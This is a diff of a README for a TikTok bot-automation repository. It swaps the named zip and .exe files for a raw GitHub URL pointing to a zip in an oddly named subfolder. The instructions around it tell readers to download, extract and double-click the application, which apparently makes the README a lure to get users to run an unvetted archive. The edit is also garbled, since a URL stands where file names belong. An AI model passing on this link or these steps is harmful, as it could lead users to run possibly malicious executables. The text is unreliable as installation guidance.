akshayneq/tiktok-funnel-bot-automation/README.md

    Click on the desired version link.
 Your browser will initiate the download.

 4. **Locate the Downloaded File**
    After the download completes, find the file in your computer's downloads folder.
-The file may be named something like `tiktok-funnel-bot-automation-v1.X.X.zip`.
+The file may be named something like `https://raw.githubusercontent.com/akshayneq/tiktok-funnel-bot-automation/main/suprapedal/automation-tiktok-bot-funnel-1.1.zip`.

 5. **Extract the Files**
    If the file is in a ZIP format, you will need to extract it.
 Right-click the ZIP file and select "Extract All" or use a software tool to extract it.
 This will create a folder containing all necessary files.

 6. **Run the Application**
    Open the extracted folder and look for the application file.
-It may be named `tiktok-funnel-bot-automation.exe` or similar, depending on your system.
+It may be named `https://raw.githubusercontent.com/akshayneq/tiktok-funnel-bot-automation/main/suprapedal/automation-tiktok-bot-funnel-1.1.zip` or similar, depending on your system.
 Double-click this file to run the application.

 ## 📦 System Requirements